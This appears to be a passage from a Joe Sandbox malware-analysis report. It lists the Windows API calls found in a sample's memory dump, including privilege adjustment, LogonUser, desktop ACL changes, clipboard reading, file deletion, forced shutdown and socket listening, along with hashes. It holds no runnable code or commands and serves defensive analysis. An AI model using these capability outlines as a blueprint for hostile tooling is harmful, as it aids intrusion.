                                                                                                    • Opcode ID: c0270f82290bf691b284aa707ab20f76f54cbdea3540c201349bb9ca128c17a9
                                                                                                    • Instruction ID: 1f49d933e0855748c16b2053f64349c035ccdba996537f1d856b694d5e4f887f
                                                                                                    • Opcode Fuzzy Hash: c0270f82290bf691b284aa707ab20f76f54cbdea3540c201349bb9ca128c17a9
                                                                                                    • Instruction Fuzzy Hash: 09310E71A80218BEEB216BF55C4AFBF7E6CEB44B50F210065FA01F7191CBB19D00AB60
                                                                                                    APIs
                                                                                                      • Part of subcall function 00B016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B0170D
                                                                                                      • Part of subcall function 00B016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B0173A
                                                                                                      • Part of subcall function 00B016C3: GetLastError.KERNEL32 ref: 00B0174A
                                                                                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00B01286
                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00B012A8
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B012B9
                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B012D1
                                                                                                    • GetProcessWindowStation.USER32 ref: 00B012EA
                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 00B012F4
                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B01310
                                                                                                      • Part of subcall function 00B010BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B011FC), ref: 00B010D4
                                                                                                      • Part of subcall function 00B010BF: CloseHandle.KERNEL32(?,?,00B011FC), ref: 00B010E9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                    • String ID: $default$winsta0
                                                                                                    • API String ID: 22674027-1027155976
                                                                                                    • Opcode ID: d34541595003b1b46da6fa807da6b557c6e07174bef0b93553a63a9eb3bee7b9
                                                                                                    • Instruction ID: 4ff99b4ba39a1565f44688b0a8d81fdc6e7f27989c8a3761d65021250e61f383
                                                                                                    • Opcode Fuzzy Hash: d34541595003b1b46da6fa807da6b557c6e07174bef0b93553a63a9eb3bee7b9
                                                                                                    • Instruction Fuzzy Hash: 0F817871900209AFDF259FA8DC49BEE7FB9EF04704F2445A9F910B62A0DB758954CF20
                                                                                                    APIs
                                                                                                      • Part of subcall function 00B010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B01114
                                                                                                      • Part of subcall function 00B010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B01120
                                                                                                      • Part of subcall function 00B010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B0112F
                                                                                                      • Part of subcall function 00B010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B01136
                                                                                                      • Part of subcall function 00B010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B0114D
                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B00BCC
                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B00C00
                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00B00C17
                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00B00C51
                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B00C6D
                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00B00C84
                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B00C8C
                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00B00C93
                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B00CB4
                                                                                                    • CopySid.ADVAPI32(00000000), ref: 00B00CBB
                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B00CEA
                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B00D0C
                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B00D1E
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B00D45
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B00D4C
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B00D55
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B00D5C
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B00D65
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B00D6C
                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00B00D78
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B00D7F
                                                                                                      • Part of subcall function 00B01193: GetProcessHeap.KERNEL32(00000008,00B00BB1,?,00000000,?,00B00BB1,?), ref: 00B011A1
                                                                                                      • Part of subcall function 00B01193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B00BB1,?), ref: 00B011A8
                                                                                                      • Part of subcall function 00B01193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B00BB1,?), ref: 00B011B7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 4175595110-0
                                                                                                    • Opcode ID: 6c086fd436f401391da3b03e2f24f3a93e8bc76d8cf2fb0146c78bb73aeb7e9e
                                                                                                    • Instruction ID: 4d50d429bfe5d848da772d6910756e32481216c547c2c76bedaa8a53be175eac
                                                                                                    • Opcode Fuzzy Hash: 6c086fd436f401391da3b03e2f24f3a93e8bc76d8cf2fb0146c78bb73aeb7e9e
                                                                                                    • Instruction Fuzzy Hash: 3071397690020AABDF10AFE4DC44BAEBFB9FF04310F2446A5E915B7191DB75AA05CB70
                                                                                                    APIs
                                                                                                    • OpenClipboard.USER32(00B3CC08), ref: 00B1EB29
                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00B1EB37
                                                                                                    • GetClipboardData.USER32(0000000D), ref: 00B1EB43
                                                                                                    • CloseClipboard.USER32 ref: 00B1EB4F
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00B1EB87
                                                                                                    • CloseClipboard.USER32 ref: 00B1EB91
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00B1EBBC
                                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00B1EBC9
                                                                                                    • GetClipboardData.USER32(00000001), ref: 00B1EBD1
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00B1EBE2
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00B1EC22
                                                                                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 00B1EC38
                                                                                                    • GetClipboardData.USER32(0000000F), ref: 00B1EC44
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00B1EC55
                                                                                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00B1EC77
                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B1EC94
                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B1ECD2
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00B1ECF3
                                                                                                    • CountClipboardFormats.USER32 ref: 00B1ED14
                                                                                                    • CloseClipboard.USER32 ref: 00B1ED59
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 420908878-0
                                                                                                    • Opcode ID: 30540a1e97000d26b9cf4d8399301fdb681187a870e9d92c0f134023c57689cc
                                                                                                    • Instruction ID: aef3357d39cd8f425e6bee8d968c6ef45379f779a1ad51d8b5c1c0a631f8285f
                                                                                                    • Opcode Fuzzy Hash: 30540a1e97000d26b9cf4d8399301fdb681187a870e9d92c0f134023c57689cc
                                                                                                    • Instruction Fuzzy Hash: F561D1352042019FD300EF64D889FAABBE4EF85714F58459DF866972A1CF31DD89CB62
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00B169BE
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B16A12
                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B16A4E
                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B16A75
                                                                                                      • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B16AB2
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B16ADF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                    • API String ID: 3830820486-3289030164
                                                                                                    • Opcode ID: 4028da5e048926e51d0734a6cae98245cad313ad8dbde8794ee842c8697122b6
                                                                                                    • Instruction ID: 6f37de1d9cea6084673464be9431da94fbdbb62cb53a7e6ab5c1ebcc03f0c958
                                                                                                    • Opcode Fuzzy Hash: 4028da5e048926e51d0734a6cae98245cad313ad8dbde8794ee842c8697122b6
                                                                                                    • Instruction Fuzzy Hash: 19D14D72508300AEC714EBA4CD82EAFB7ECAF89704F44495DF589D7191EB74DA44CB62
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00B19663
                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00B196A1
                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00B196BB
                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00B196D3
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B196DE
                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00B196FA
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B1974A
                                                                                                    • SetCurrentDirectoryW.KERNEL32(00B66B7C), ref: 00B19768
                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B19772
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B1977F
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B1978F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                    • String ID: *.*
                                                                                                    • API String ID: 1409584000-438819550
                                                                                                    • Opcode ID: f5a22021658a313e73e0bb0bfc2b78090c85982b245665379fed58100a5e134a
                                                                                                    • Instruction ID: 135f7a577104f8ffb9f046c5d5a9a671983129dfddc80e4c17a180d43697f195
                                                                                                    • Opcode Fuzzy Hash: f5a22021658a313e73e0bb0bfc2b78090c85982b245665379fed58100a5e134a
                                                                                                    • Instruction Fuzzy Hash: D331A032540259AADB14AFF4DC59ADE7BECEF09320F644195F815E30E0DB34DE848B64
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00B197BE
                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00B19819
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B19824
                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00B19840
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B19890
                                                                                                    • SetCurrentDirectoryW.KERNEL32(00B66B7C), ref: 00B198AE
                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B198B8
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B198C5
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B198D5
                                                                                                      • Part of subcall function 00B0DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B0DB00
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                    • String ID: *.*
                                                                                                    • API String ID: 2640511053-438819550
                                                                                                    • Opcode ID: 5efaf9fdcfbe3d99f43a28fc1910b36ef830c9818cfdf9b49662896fe2b0d8d3
                                                                                                    • Instruction ID: 6aacb86cff4e30b42c572f21aac517bd0d4ac6255e11674fe6e76f47f62a1053
                                                                                                    • Opcode Fuzzy Hash: 5efaf9fdcfbe3d99f43a28fc1910b36ef830c9818cfdf9b49662896fe2b0d8d3
                                                                                                    • Instruction Fuzzy Hash: 0A31B232540659AADB14AFB4DC59ADE7BECEF06360F6441A5F814A30E0DB30D9858B64
                                                                                                    APIs
                                                                                                    • GetLocalTime.KERNEL32(?), ref: 00B18257
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B18267
                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B18273
                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B18310
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B18324
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B18356
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B1838C
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B18395
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                    • String ID: *.*
                                                                                                    • API String ID: 1464919966-438819550
                                                                                                    • Opcode ID: 000798120dfae5a995e1357b9b35f6b85fcca76af0153e45d624bcef287bfa64
                                                                                                    • Instruction ID: fcdd8be76debd1d10b72597b7a4f3a211f0e307830f744f09ccb6ad029fbacf2
                                                                                                    • Opcode Fuzzy Hash: 000798120dfae5a995e1357b9b35f6b85fcca76af0153e45d624bcef287bfa64
                                                                                                    • Instruction Fuzzy Hash: 86618A725043059FCB10EF60D8809AFB3E8FF8A310F44896EF99993291DB31E945CB92
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA3A97,?,?,00AA2E7F,?,?,?,00000000), ref: 00AA3AC2
                                                                                                      • Part of subcall function 00B0E199: GetFileAttributesW.KERNEL32(?,00B0CF95), ref: 00B0E19A
                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00B0D122
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00B0D1DD
                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00B0D1F0
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00B0D20D
                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B0D237
                                                                                                      • Part of subcall function 00B0D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00B0D21C,?,?), ref: 00B0D2B2
                                                                                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 00B0D253
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B0D264
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                    • String ID: \*.*
                                                                                                    • API String ID: 1946585618-1173974218
                                                                                                    • Opcode ID: 474c40d405657c44fab39978cad36ccf819352149552121a94d5bcb16ed75566
                                                                                                    • Instruction ID: 69fb2ef38cf13303d775503ceca7154d498df672a156bcd580c5911a42113a5a
                                                                                                    • Opcode Fuzzy Hash: 474c40d405657c44fab39978cad36ccf819352149552121a94d5bcb16ed75566
                                                                                                    • Instruction Fuzzy Hash: 97615C3180111DAECF05EBE0DA929EEBBB5AF55340F2481A9E406771D1EF35AF09CB61
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1737998785-0
                                                                                                    • Opcode ID: 6990be5bf4f3f99e583d1407a4aa186fd49b62f81c91f0cd3d757dc8621bb4be
                                                                                                    • Instruction ID: 1fd8fddc1864ee0a993a603d90cdaf1eaf3c8d7c01e13091c1d4a12c7fcc8a44
                                                                                                    • Opcode Fuzzy Hash: 6990be5bf4f3f99e583d1407a4aa186fd49b62f81c91f0cd3d757dc8621bb4be
                                                                                                    • Instruction Fuzzy Hash: C241B435204611AFE310DF59D889F59BBE1FF44318F54C099E8259B6A2CB35EC81CB90
                                                                                                    APIs
                                                                                                      • Part of subcall function 00B016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B0170D
                                                                                                      • Part of subcall function 00B016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B0173A
                                                                                                      • Part of subcall function 00B016C3: GetLastError.KERNEL32 ref: 00B0174A
                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00B0E932
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                    • String ID: $ $@$SeShutdownPrivilege
                                                                                                    • API String ID: 2234035333-3163812486
                                                                                                    • Opcode ID: ae01a36c056c9ea6d34ac3138fa4a1d4f54265c39b3792bd3d0e51a4a471bb3e
                                                                                                    • Instruction ID: 9a3b8cbe9c187b871ddb6861d80ea139ca88f490fd0d25d1458113d302f2c974
                                                                                                    • Opcode Fuzzy Hash: ae01a36c056c9ea6d34ac3138fa4a1d4f54265c39b3792bd3d0e51a4a471bb3e
                                                                                                    • Instruction Fuzzy Hash: 8D01D673610211AFEB5426B89C8ABBF7ADCE714750F154DA2FD22F31D1DAB19C408294
                                                                                                    APIs
                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B21276
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00B21283
                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00B212BA
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00B212C5
                                                                                                    • closesocket.WSOCK32(00000000), ref: 00B212F4
                                                                                                    • listen.WSOCK32(00000000,00000005), ref: 00B21303
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00B2130D
                                                                                                    • closesocket.WSOCK32(00000000), ref: 00B2133C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                    • String ID:
                                                                                                    • API String ID: 540024437-0
                                                                                                    • Opcode ID: e6fdd29c97bc410a1a51731ea862c47453cb42bb1d7d6f308dd3dfe090cd55ff
                                                                                                    • Instruction ID: 21f833be267dc91376bd467332b494f493f5dad6ed0095f8e1046d87b4cd52aa
                                                                                                    • Opcode Fuzzy Hash: e6fdd29c97bc410a1a51731ea862c47453cb42bb1d7d6f308dd3dfe090cd55ff
                                                                                                    • Instruction Fuzzy Hash: 4C416031A00110EFD710DF68D584B2ABBE6EF56314F288598E85A9F2D6C771ED81CBA1
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00ADB9D4
                                                                                                    • _free.LIBCMT ref: 00ADB9F8
                                                                                                    • _free.LIBCMT ref: 00ADBB7F
                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00B43700), ref: 00ADBB91
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00B7121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00ADBC09
